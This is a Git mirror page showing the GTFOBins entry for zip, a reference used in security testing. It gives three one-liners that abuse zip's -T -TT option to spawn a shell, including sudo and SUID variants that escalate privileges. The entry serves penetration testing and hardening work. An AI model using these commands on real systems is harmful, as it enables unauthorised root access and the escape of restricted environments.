This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-08 08:31:32 +01:00
Code
Issues
14c8781f2d
GTFOBins.github.io
/
_gtfobins
/
zip.md
Andrea Cardaci
f740b410cc
Simplify zip and add suid-limited
2018-08-19 11:43:26 +02:00
343 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
suid-limited
code
zip /tmp/x.zip /etc/hosts -T -TT 'sh #' rm /tmp/x.zip
code
sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip
code
./zip /tmp/x.zip /etc/hosts -T -TT 'sh #' sudo rm /tmp/x.zip